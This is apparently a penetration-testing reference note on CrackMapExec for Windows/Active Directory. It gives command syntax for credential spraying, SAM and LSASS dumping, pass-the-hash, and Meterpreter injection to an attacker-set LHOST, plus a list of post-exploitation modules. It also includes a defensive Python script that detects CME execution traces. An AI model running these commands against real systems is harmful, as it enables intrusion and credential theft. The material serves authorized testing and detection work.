CrackMapExec
CrackMapExec is a "Swiss army knife for pentesting Windows / Active Directory environments" that wraps around multiple Impacket modules.

CrackMapExec can be used to test credentials and execute commands through the SMB, WinRM, MSSQL, SSH and HTTP services.

Over SMB, CrackMapExec supports different command execution methods:

- wmiexec (default): executes commands via WMI.
- smbexec: executes commands by creating and running a service, similarly to the PsExec utility.
- atexec: executes commands by remotely scheduling a task through the Windows task scheduler.
- mmcexec: executes commands over the MMC20.Application DCOM object.

CrackMapExec additionally supports authentication with Kerberos tickets (specified in the KRB5CCNAME environment variable) on Linux operating systems.
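Each of the SMB execution methods above leaves a distinct trace in standard Windows telemetry: wmiexec spawns the shell under WmiPrvSE.exe, smbexec installs a service whose binary path is a cmd.exe one-liner, atexec registers a scheduled task that runs cmd.exe, and mmcexec spawns the shell under mmc.exe, with command output typically redirected to an administrative share. The following script is an added detection example for defenders, not part of CrackMapExec or Impacket: it classifies flattened process-creation (Sysmon 1 / Security 4688), service-installation (System 7045 / Security 4697) and scheduled-task (Security 4698) records by the method they resemble. The record field names and the sample records are constructed for this example; the event IDs and parent/child relationships are standard Windows and Sysmon behaviour.

```python
"""Classify Windows event records by the CrackMapExec SMB execution method
they resemble (wmiexec, smbexec, atexec, mmcexec).

Added example for defenders; not CrackMapExec's own code. The record
layout (one dict per event, fields below) is an assumption of this
example; the sample records are constructed.
"""
import re
from typing import Optional

# Image names that indicate a command shell was spawned.
SHELLS = ("cmd.exe", "powershell.exe")

# Parent processes each execution method runs its shell under:
# WmiPrvSE.exe hosts WMI providers (wmiexec), mmc.exe hosts the
# MMC20.Application DCOM object (mmcexec).
PARENT_TO_METHOD = {
    "wmiprvse.exe": "wmiexec (WMI)",
    "mmc.exe": "mmcexec (MMC20.Application DCOM)",
}

# Output redirected to an administrative share (\\host\ADMIN$\... or
# \\host\C$\...), which is how these methods return command output.
ADMIN_SHARE_REDIRECT = re.compile(r"\\\\[^\\]+\\(ADMIN\$|C\$)\\", re.IGNORECASE)

# A service binary path or task action that is a shell one-liner rather
# than a real executable (e.g. "%COMSPEC% /Q /c ..." or "cmd.exe /C ...").
SHELL_ONELINER = re.compile(r"(%COMSPEC%|cmd\.exe)\s+/[qc]", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('C:\\x\\y.exe' -> 'y.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return the execution method an event resembles, or None if benign-looking."""
    eid = event.get("event_id")

    # Sysmon 1 / Security 4688: process creation with parent and child images.
    if eid in (1, 4688):
        parent = _basename(event.get("parent", ""))
        child = _basename(event.get("image", ""))
        if child not in SHELLS:
            return None
        if parent in PARENT_TO_METHOD:
            return PARENT_TO_METHOD[parent]
        if ADMIN_SHARE_REDIRECT.search(event.get("cmdline", "")):
            return "unknown method (shell output redirected to admin share)"
        return None

    # System 7045 / Security 4697: a service installed with a shell as its binary.
    if eid in (7045, 4697):
        if SHELL_ONELINER.search(event.get("image_path", "")):
            return "smbexec (service creation)"
        return None

    # Security 4698: a scheduled task whose action is a shell one-liner.
    if eid == 4698:
        if SHELL_ONELINER.search(event.get("task_command", "")):
            return "atexec (scheduled task)"
        return None

    return None


def scan(events) -> list:
    """Return (event_id, method) for every record that matches a method."""
    hits = []
    for event in events:
        method = classify(event)
        if method:
            hits.append((event["event_id"], method))
    return hits


# Constructed sample records (not real logs), flattened to one dict each.
SAMPLE_EVENTS = [
    {"event_id": 1, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__out 2>&1"},
    {"event_id": 7045, "service_name": "BTOBTO",
     "image_path": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__out 2^>^&1"},
    {"event_id": 4698, "task_name": r"\Microsoft\Windows\Example",
     "task_command": r"cmd.exe /C whoami > C:\Windows\Temp\out.txt"},
    {"event_id": 1, "parent": r"C:\Windows\System32\mmc.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -c whoami"},
    # Benign-looking records: an interactive shell and a normal service install.
    {"event_id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"event_id": 7045, "service_name": "VendorAgent",
     "image_path": r"C:\Program Files\Vendor\agent.exe"},
]

if __name__ == "__main__":
    for event_id, method in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {method}")
```

Running the script on the constructed records flags the first four and leaves the two benign ones untouched. The parent-process and admin-share checks are deliberately independent, so a shell spawned under an unusual parent but writing to \\host\ADMIN$ is still reported, just without a method name.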
CrackMapExec installation
CrackMapExec requires various Python dependencies (sometimes in specific versions), making its installation somewhat challenging at times.

CrackMapExec pre-compiled binaries for Linux and Windows (that still require Python3 to be installed on the system) can be downloaded from the "Actions" tab of CrackMapExec's GitHub repository. Fully standalone binaries for Linux and Windows can be retrieved from the OffensivePythonPipeline.

For more information on CrackMapExec's installation, refer to the official documentation.
# As of March 2021, the crackmapexec package of the Kali Linux distribution is up to date and can be used to easily install CrackMapExec.
apt install crackmapexec
# Installation using Docker.
docker pull byt3bl33d3r/crackmapexec
docker run byt3bl33d3r/crackmapexec:latest [...]
CrackMapExec usage
# As of December 2018, crackmapexec does not provide an option to output to a file.
# The tee utility can be used to both display and store to a file the crackmapexec standard output.
# crackmapexec <[...]> | tee <OUTPUT_FILE>
# <TARGET | TARGETS> - can be IP(s), range(s), CIDR(s), hostname(s), FQDN(s) or file(s) containing a list of targets.
crackmapexec <smb | winrm | ssh | mssql | http> <TARGET | TARGETS> [-M <MODULE> [-o <MODULE_OPTION>]] (-d <DOMAIN> | --local-auth) -u <USERNAME | USERNAMES_FILE> (-p <PASSWORD | PASSWORDS_FILE> | -H <HASH>) [--sam] [-x <COMMAND> | -X <PS_COMMAND>]
# Kerberos authentication on Linux systems. The targets must be fully qualified hostnames (and not IP addresses) for the Kerberos authentication to work.
export KRB5CCNAME=<TICKET_CCACHE_FILE_PATH>
crackmapexec smb <TARGET | TARGETS> --kerberos [...]
Additionally, CrackMapExec includes multiple modules that can be used for post-exploitation:
crackmapexec smb --list-modules
[*] Get-ComputerDetails Enumerates sysinfo
[*] bh_owned Set pwned computer as owned in Bloodhound
[*] bloodhound Executes the BloodHound recon script on the target and retreives the results to the attackers' machine
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] enum_avproducts Gathers information on all endpoint protection solutions installed on the the remote host(s) via WMI
[*] enum_chrome Decrypts saved Chrome passwords using Get-ChromeDump
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] get_keystrokes Logs keys pressed, time and the active window
[*] get_netdomaincontroller Enumerates all domain controllers
[*] get_netrdpsession Enumerates all active RDP sessions
[*] get_timedscreenshot Takes screenshots at a regular interval
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] invoke_sessiongopher Digs up saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using SessionGopher
[*] invoke_vnc Injects a VNC client in memory
[*] lsassy Dump lsass and parse the result remotely with lsassy
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] mimikatz Dumps all logon credentials from memory
[*] mimikatz_enum_chrome Decrypts saved Chrome passwords using Mimikatz
[*] mimikatz_enum_vault_creds Decrypts saved credentials in Windows Vault/Credential Manager
[*] mimikittenz Executes Mimikittenz
[*] multirdp Patches terminal services in memory to allow multiple RDP users
[*] netripper Capture's credentials by using API hooking
[*] pe_inject Downloads the specified DLL/EXE and injects it into memory
[*] rdp Enables/Disables RDP
[*] rid_hijack Executes the RID hijacking persistence hook.
[*] scuffy Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
[*] shellcode_inject Downloads the specified raw shellcode and injects it into memory
[*] slinky Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
[*] spider_plus List files on the target server (excluding `DIR` directories and `EXT` extensions) and save them to the `OUTPUT` directory if they are smaller then `SIZE`
[*] test_connection Pings a host
[*] tokens Enumerates available tokens
[*] uac Checks UAC status
[*] wdigest Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
[*] wireless Get key of all wireless interfaces
CrackMapExec modules
CrackMapExec notable modules usage:
# Authentication with a 1:1 mapping between the username and password / hashes files.
crackmapexec smb <DC_IP | TARGET> --continue-on-success --no-bruteforce -d '<DOMAIN>' -u <USERNAME_FILE> [-p <PASSWORD_FILE> | -H <HASH_FILE>]
# SAM dump.
crackmapexec smb <TARGET | TARGETS> --sam (-d <DOMAIN> | --local-auth) -u <USERNAME> (-p <PASSWORD | PASSWORDS_FILE> | -H <HASH>)
# LSASS dump using lsassy.
crackmapexec smb <TARGET | TARGETS> -M lsassy (-d <DOMAIN> | --local-auth) -u <USERNAME> (-p <PASSWORD | PASSWORDS_FILE> | -H <HASH>)
# Outdated LSASS dump technique using mimikatz that is flagged by most antivirus products.
crackmapexec smb <TARGET | TARGETS> -M mimikatz (-d <DOMAIN> | --local-auth) -u <USERNAME> (-p <PASSWORD | PASSWORDS_FILE> | -H <HASH>)
# Meterpreter.
# msf > use multi/handler
# msf exploit(handler) > set payload windows/meterpreter/reverse_https
crackmapexec smb <TARGET | TARGETS> -M met_inject -o LHOST=<HOST> LPORT=<PORT> -d <DOMAIN> -u <USERNAME> (-p <PASSWORD | PASSWORDS_FILE> | -H <HASH>)
For more information on how to remotely extract credentials from the SAM registry hive and the LSASS process, refer to the [Windows] Post exploitation note.

Note that:

- The --lsa option dumps LSA secrets, which can't be used in a Pass-the-Hash attack and are harder to crack.
- The <TARGET> and <MODULE> should be specified before the credentials, as a CrackMapExec bug could otherwise skip the targets / module.
- If the targeted host is unreachable, CrackMapExec may exit without returning any error message.
- In case met_inject fails, a local administrator can be added for RDP access or a PowerShell reverse shell injected in memory instead (refer to the [General] Shells - PowerShell note).
- If a permission denied error is raised upon first execution of crackmapexec on a Linux system, the necessary rights to create new files in the user's HOME folder may be missing. A temporary alternative HOME folder can be specified for the crackmapexec execution: HOME=<PATH> crackmapexec [...]